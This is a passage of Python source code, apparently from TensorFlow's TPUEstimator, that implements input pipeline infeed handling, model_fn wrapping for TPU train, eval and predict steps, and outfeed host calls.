return enqueue_ops
else:
return {
'ops': enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
call site. To be precise, based on the configuration in
`_InternalTPUContext`, it invokes `input_fn` for all cores (usually
multi-host TPU training) or for one host (usually for single-host TPU
evaluation), and sends all `features` and `labels` returned by `input_fn` to
TPU infeed. For per-core invocation, `features` and `labels` are piped to
infeed directly, one tuple for each core. For per-host invocation, `features`
and `labels` are split at host (with respect to `batch_axis`) and piped to all
cores accordingly.
In addition, flatten/unflatten are handled by `_InputPipeline` also. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
3. ((arbitrarily nested structure of features), labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
may expect multiple `features` and `labels` tuples one for each core.
TPUEstimator allows various different structures for inputs (namely `features`
and `labels`). Both `features` and `labels` can be any nested sturcture
supported by TF nest (namely, dict, tuples, namedtuples or any nested
structure of such of Tensors). `labels` could be `None` as well.
These are flattened before they are passed to the infeed/outfeed library
as that expectes flattend lists.
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self, input_partition_dims=None):
# Holds the structure of inputs
self._feature_structure = {}
self._flattened_input_dims = None
if input_partition_dims:
# This should have been validated in TPUConfig.
assert len(input_partition_dims) <= 2, 'must have 1 or 2 elements.'
if len(input_partition_dims) == 2:
self._feature_dims, self._label_dims = input_partition_dims
else:
self._feature_dims = input_partition_dims[0]
self._label_dims = None
assert self._feature_dims is not None, ('input_partition_dims[0] must '
'not be None')
else:
self._feature_dims = None
self._label_dims = None
# Internal state.
self._initialized = False
@property
def flattened_input_dims(self):
assert self._initialized, 'InputsStructureRecorder is not initialized.'
return self._flattened_input_dims
def has_labels(self):
return 'labels' in self._feature_structure
def _flatten_input_dims(self, feature_dims, feature_dims_names, label_dims,
label_dims_names, label_names, has_labels):
"""Flatten input dims with the same order as flattened input tensors."""
flattened_input_dims = []
if feature_dims_names:
# We need a fixed ordering for matching the tensors in features.
flattened_input_dims.extend(
[feature_dims[name] for name in feature_dims_names])
else:
flattened_input_dims.append(feature_dims)
if label_dims_names:
# We need a fixed ordering for matching the tensors in labels.
flattened_input_dims.extend(
[label_dims[name] for name in label_dims_names])
else:
if label_names:
num_tensors_in_label = len(label_names)
else:
num_tensors_in_label = int(has_labels)
# Setting `None` in input_partition_dims[1] will apply `None` to
# all the tensors in labels, regardless of internal structure.
flattened_input_dims.extend([label_dims] * num_tensors_in_label)
return flattened_input_dims
def validate_and_record_structure(self, features, labels):
"""Validates and records the structure of `features` and `labels`."""
# Extract structure.
has_labels = labels is not None
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if not self._initialized:
# Record structure.
self._initialized = True
if self._feature_dims is not None:
feature_dims_names = _extract_key_names(self._feature_dims)
if feature_dims_names != feature_names:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched feature'
' keys. Expected {}, got {}'.format(feature_names,
feature_dims_names))
label_dims_names = _extract_key_names(self._label_dims)
if self._label_dims is not None and label_dims_names != label_names:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched label'
' keys. Expected {}, got {}'.format(label_names,
label_dims_names))
self._flattened_input_dims = self._flatten_input_dims(
self._feature_dims, feature_dims_names, self._label_dims,
label_dims_names, label_names, has_labels)
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
self._feature_structure['features'] = features
if labels is not None:
self._feature_structure['labels'] = labels
if signals is not None:
self._feature_structure['signals'] = signals
return data_nest.flatten(self._feature_structure)
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have identical structure (single tensor vs
dict) as the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
unflattened_inputs = data_nest.pack_sequence_as(self._feature_structure,
flattened_inputs)
return _Inputs(
unflattened_inputs['features'],
unflattened_inputs.get('labels'),
signals=unflattened_inputs.get('signals'))
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder(
ctx.input_partition_dims)
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
# While tf.while_loop is called, the body function, which invokes
# `enqueue_fn` passed in, is called to construct the graph. So, input_fn
# structure is recorded.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure())
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(
values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_dataset_initializers = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-Core input pipeline deployment.
# Invoke input pipeline for each core and placed on the corresponding
# host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
enqueue_ops_fn, captured_infeed_queue = (
generate_per_core_enqueue_ops_fn_for_host(
self._ctx, self._input_fn, self._inputs_structure_recorder,
host_device, host_id))
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
elif self._ctx.is_input_broadcast_with_iterators():
# Only calls input_fn in host 0.
host_device = tpu_host_placement_fn(host_id=0)
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_broadcast_enqueue_ops_fn(self._ctx, self._input_fn,
self._inputs_structure_recorder,
num_hosts))
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
else:
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_v2_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, host_device, host_id))
else:
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, self._batch_axis,
host_device, host_id))
# NOTE(xiejw): We dispatch here based on the return type of the
# users `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
# iterator outside of tf.while_loop, and call the iterator.get_next
# inside tf.while_loop. This should be always safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use
# python loop to enqueue the data into TPU system. This may be
# slow compared to the previous case.
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
# infeed_queue is used to generate dequeue ops. The only thing it uses for
# dequeue is dtypes and types. So, any one can be used. Here, grab the
# first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, [
util_lib.MultiHostDatasetInitializerHook(all_dataset_initializers)
], run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
"""Validates the input pipeline.
Perform some sanity checks to log user friendly information. We should
error out to give users better error message. But, if
_WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break
user code, so, log a warning.
Raises:
RuntimeError: If the validation failed.
"""
if ops.get_default_graph().get_collection(ops.GraphKeys.QUEUE_RUNNERS):
err_msg = ('Input pipeline contains one or more QueueRunners. '
'It could be slow and not scalable. Please consider '
'converting your input pipeline to use `tf.data` instead (see '
'https://www.tensorflow.org/guide/datasets for '
'instructions.')
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
logging.warn(err_msg)
def call_computation(computation_inputs,
computation,
experimental_export_device_assignment,
batch_config=None):
"""Call computation.
Args:
computation_inputs: A tensor or dict of tensors, the inputs to the
computation.
computation: A Python function that takes no inputs and builds computation
graph. If `computation` returns m outputs, this function will return a
list of m Tensors.
experimental_export_device_assignment: If `True`, use user-provided device
assignment. If `False`, round-robin computation among all TPU cores
visible to the host.
batch_config: A BatchConfig named tuple specifying the batching
configuration to use for inference batching.
Returns:
A list of output tensors.
"""
if experimental_export_device_assignment:
return computation(computation_inputs)
# Using `TPUPartitionedCall` makes it possible to target a different
# TPU core with every `Session.run()` call. Note that the entire inference
# graph executes on a single core, and that invocations of this graph
# will round-robin among the cores attached to a host.
def tpu_partitioned_call(partition_inputs):
# capture_resource_var_by_value enables variables to be mirrored on TPU
# to avoid fetching from CPU, since variables do not change during
# inference.
@function.Defun(capture_resource_var_by_value=False)
def tpu_subgraph():
return computation(partition_inputs)
return tpu_functional.TPUPartitionedCall(
args=tpu_subgraph.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_subgraph.definition.signature.output_arg],
f=tpu_subgraph)
# Not using Batching Function but use TPUPartitionedCall/all cores.
if not batch_config:
return tpu_partitioned_call(computation_inputs)
# Use Batching Function and TPUPartitionedCall/all cores.
# Note that BatchingFunction requires a list of tensors and doesn't support
# a dict of tensors. So we preserve the structure by deterministically
# flattening the dict before batching and then recomposing it after batching
# to feed into the computation.
ordered_inputs_list = nest.flatten(computation_inputs)
@batch_ops.batch_function(
num_batch_threads=batch_config.num_batch_threads,
max_batch_size=batch_config.max_batch_size,
batch_timeout_micros=batch_config.batch_timeout_micros,
allowed_batch_sizes=batch_config.allowed_batch_sizes,
max_enqueued_batches=batch_config.max_enqueued_batches,
autograph=False)
def batched_tpu_computation(*tensor_args):
"""Recompose the input feature dict and calls the TPU computation."""
computation_feature_input = nest.pack_sequence_as(computation_inputs,
tensor_args)
return tpu_partitioned_call(computation_feature_input)
return batched_tpu_computation(*ordered_inputs_list)
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
This makes calling model_fn on CPU and TPU easier and more consistent and
performs necessary check and mutation required by TPU training and evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, config, params, ctx):
self._model_fn = model_fn
self._config = config
self._params = params
self._ctx = ctx
def call_without_tpu(self, features, labels, is_export_mode):
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def _add_embedding_features(self, features, hook_dummy_table_variables):
"""Add embedding features, optionally add hook to intercept gradient."""
if self._ctx.embedding_config:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
embedding_activations = tpu_embedding_.get_activations()
if hook_dummy_table_variables:
new_embedding_activations = (
tpu_embedding_gradient.hook_dummy_table_variables_to_activations(
tpu_embedding_, embedding_activations,
self._ctx.embedding_config.dummy_table_variables))
features.update(new_embedding_activations)
else:
features.update(embedding_activations)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
For TPU training, a train (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input should be taken from TPU infeed rather
than input pipeline (input_fn) directly. To fit TPU loop and replicate
pattern, the original train computation should be reformed, which is the
returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of train_fn, host_calls, and captured scaffold_fn. The train_fn
representing the train step for TPU.
"""
host_call = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_training_hooks = _CapturedObject()
def train_step(loss):
"""Training step function for use inside a while loop."""
del loss # unused; required in function signature.
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, True)
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels))
loss, train_op = estimator_spec.loss, estimator_spec.train_op
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
captured_training_hooks.capture(estimator_spec.training_hooks)
if self._ctx.embedding_config is None:
apply_sparse_grads = []
else:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
gradients = (
tpu_embedding_gradient.get_gradients_through_dummy_table_variables(
tpu_embedding_)
)
grad_multiplier = self._ctx.embedding_config.get_grad_multiplier()
if grad_multiplier is not None:
scaled_gradients = collections.OrderedDict(
(k, v * grad_multiplier) for k, v in six.iteritems(gradients))
else:
scaled_gradients = gradients
apply_sparse_grads = [
tpu_embedding_.generate_send_gradients_op(scaled_gradients)
]
# We must run train_op to update the variables prior to running the
# outfeed.
with ops.control_dependencies([train_op] + apply_sparse_grads):
host_call_outfeed_ops = []
host_call_fn, host_call_args = None, []
if (isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec) # pylint: disable=protected-access
and estimator_spec.host_call is not None):
host_call_fn, host_call_args = estimator_spec.host_call
if host_call_fn:
# Ignore dummy hostcalls (no arguments)
if host_call_args:
host_call.record({'host_call': estimator_spec.host_call})
host_call_outfeed_ops = host_call.create_enqueue_op()
else:
# Create a host call for the loss to track execution progress
# Without this, we don't have any indication of the state of the
# TPU program.
host_call.record({
'host_call': (lambda loss_t: loss_t,
[array_ops.reshape(loss, [1])])
})
host_call_outfeed_ops = host_call.create_enqueue_op()
with ops.control_dependencies(host_call_outfeed_ops):
return array_ops.identity(loss)
return (train_step, host_call, captured_scaffold_fn,
captured_training_hooks)
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
For TPU evaluation, a eval (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input and output are slightly different. Input,
features and labels, should be taken from TPU infeed rather than input
pipeline (input_fn) directly. Output is managed in two stages. First, the
model outputs as the result of evaluation computation, usually model logits,
should be transferred from TPU system to CPU. Then, all model outputs are
concatenated first on CPU and sent to the metric_fn for metrics computation.
To fit TPU evaluation pattern, the original eval computation should be
reformed, which is the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of eval_fn, host_calls, and captured scaffold_fn. The eval_fn
representing the eval step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_eval_hooks = _CapturedObject()
def eval_step(total_loss):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, False)
tpu_estimator_spec = self._call_model_fn(features, labels)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU evaluation must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_eval_hooks.capture(tpu_estimator_spec.evaluation_hooks)
to_record = {}
if tpu_estimator_spec.eval_metrics:
to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return math_ops.add(total_loss, loss)
return eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of predict_fn, host_calls, and captured scaffold_fn. The
predict_fn representing the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_predict_hooks = _CapturedObject()
def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, (
'Internal Error: `signals` is missing.')
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU prediction must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
self._verify_tpu_spec_predictions(tpu_estimator_spec.predictions)
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_predict_hooks.capture(tpu_estimator_spec.prediction_hooks)
to_record = {}
identity_fn = lambda **kwargs: kwargs
to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
to_record['signals'] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return (predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks)
def _verify_tpu_spec_predictions(self, predictions):
"""Validates TPUEstimatorSpec.predictions dict."""
# TODO(xiejw): Adds validation for prediction dictionrary.
# TODO(xiejw): Adds support for single tensor as predictions.
if not isinstance(predictions, dict):
raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
for (key, tensor) in predictions.items():
if tensor.shape.dims[0].value is None:
raise ValueError(
'The tensor with key ({}) in TPUEstimatorSpec.predictions has '
'dynamic shape (should be static). Tensor: {}'.format(key, tensor))
return predictions
def _validate_model_features_and_labels(self, features, labels,
is_export_mode):
"""Validates that the features and labels for the model function are valid.
A valid features/labels object is the one with:
- Type: A tensor or any nested structure of tensors supported by TF nest,
namely nested dictionary, tuple, namedtuple, or sequence of tensors.
- Static shape if is_export_mode is False.
Args:
features: the features that would be input to the model function.
labels: the labels that would be input to the model function.
is_export_mode: boolean value specifying if in export mode.
Raises:
TypeError: If features/labels are not of the correct type.
ValueError: If features/labels have dynamic shape.
"""
def validate(obj, obj_name):
"""Helper validate function."""
if is_export_mode or self._ctx.is_running_on_cpu(is_export_mode):
return
if isinstance(obj, ops.Tensor):
if not obj.get_shape().is_fully_defined():
raise ValueError(
'The {} to the model returned by input_fn must have static shape.'
' Tensor: {}'.format(obj_name, obj))
else:
for tensor in data_nest.flatten(obj):
if not tensor.get_shape().is_fully_defined():
raise ValueError(
('The {} to the model returned by input_fn must have static '
'shape. Tensor: {}').format(obj_name, tensor))
validate(features, 'features')
if labels is not None:
validate(labels, 'labels')
def _call_model_fn(self, features, labels, is_export_mode=False):
"""Calls the model_fn with required parameters."""
self._validate_model_features_and_labels(features, labels, is_export_mode)
model_fn_args = function_utils.fn_args(self._model_fn)
kwargs = {}
# Makes deep copy with `config` and params` in case user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if 'labels' in model_fn_args:
kwargs['labels'] = labels
elif labels is not None:
raise ValueError(
'model_fn does not take labels, but input_fn returns labels.')
if 'mode' in model_fn_args:
kwargs['mode'] = self._ctx.mode
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
if 'params' not in model_fn_args:
raise ValueError('model_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params[\'batch_size\']'.format(self._model_fn))
if is_export_mode:
batch_size_for_model_fn = None
else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
_add_item_to_params(params, _BATCH_SIZE_KEY, batch_size_for_model_fn)
running_on_cpu = self._ctx.is_running_on_cpu(is_export_mode)
# In export mode, params['use_tpu'] has already been set based on mode
# (i.e. True for _REWRITE_FOR_INFERENCE_MODE, False otherwise).
if not is_export_mode:
_add_item_to_params(params, _USE_TPU_KEY, not running_on_cpu)
if not running_on_cpu:
user_context = tpu_context.TPUContext(
internal_ctx=self._ctx, call_from_input_fn=False)
_add_item_to_params(params, _CTX_KEY, user_context)
estimator_spec = self._model_fn(features=features, **kwargs)
if (running_on_cpu and
isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec)): # pylint: disable=protected-access
# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`.
return estimator_spec.as_estimator_spec()
else:
return estimator_spec
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
return estimator_spec
err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.'
if estimator_spec.training_chief_hooks:
raise ValueError(
err_msg.format('training_chief_hooks') + 'If you want' +
' to pass training hooks, please pass via training_hooks.')
if estimator_spec.scaffold:
logging.warning('EstimatorSpec.Scaffold is ignored by TPU train/eval. '
'Please use TPUEstimatorSpec.')
return estimator_spec
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError('{} should be tuple or list'.format(name))
if len(host_call) != 2:
raise ValueError('{} should have two elements.'.format(name))
if not callable(host_call[0]):
raise TypeError('{}[0] should be callable.'.format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = function_utils.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
'In TPUEstimatorSpec.{}, length of tensors {} does not match '
'method args of the function, which takes {}.'.format(
name, len(host_call[1]), len(fn_args)))
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
return ret
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
with ops.device(tpu.core(0)):
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
The tensors are concatenated along dimension 0 to form a global tensor
across all shards. The concatenated function is passed to the host_fn and
executed on the first host.
Returns:
A dictionary mapping name to the return type of the host_call by that
name.
Raises:
RuntimeError: If outfeed tensor is scalar.
"""
if not self._names:
return {}
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
# constraint it such that we have at most one outfeed dequeue and enqueue
# per replica.
for i in xrange(self._ctx.num_replicas):
host_device, ordinal_id = self._ctx.device_for_replica(i)
with ops.device(host_device):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes,
shapes=tensor_shapes,
device_ordinal=ordinal_id)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
flat_dequeue_ops = []
for l in dequeue_ops:
flat_dequeue_ops.extend(l)
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[pos:pos +
len(self._tensors[name])]
pos += len(self._tensors[name])
def _call_host_fn(fn, *args, **kw):
context = CatchInvalidHostcallFunctions()
context.Enter()
result = fn(*args, **kw)
context.Exit()
context.ExitResult(result)
return result
# It is assumed evaluation always happens on single host TPU system. So,
# place all ops on tpu host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with ops.device(self._ctx.tpu_host_placement_function(replica_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
'All tensors outfed from TPU should preserve batch size '
'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
# TODO(xiejw): Make the specification of the outfeed combinaton
# function more explicit and well-documented. We may want to give the
# user the option of concatenating along any axis.
if (self._ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST):
# If the infeed is in BROADCAST mode (each core recieving the same
# input), then we assume that the cores also produce identical
# copies of the same output, and we simply take the output from
# the first core. This mode is used by Mesh-TensorFlow.
with ops.control_dependencies(dequeue_ops[i]):
dequeue_ops[i] = array_ops.identity(dequeue_ops[i][0])
else:
# Assume that the input has been batch-split and that axis 0 of the
# output tensors represents the batch size. Concatenate along
# the axis 0 to re-combine the batch.
dequeue_ops[i] = array_ops.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = _call_host_fn(self._host_fns[name], **dequeue_ops)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
else:
ret[name] = _call_host_fn(self._host_fns[name], *dequeue_ops)
# force all dequeue operations to be run if not consumed by the host calls
ret['__force_dequeue'] = control_flow_ops.group(*flat_dequeue_ops)
return ret
class _OutfeedHostCallHook(session_run_hook.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return basic_session_run_hooks.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
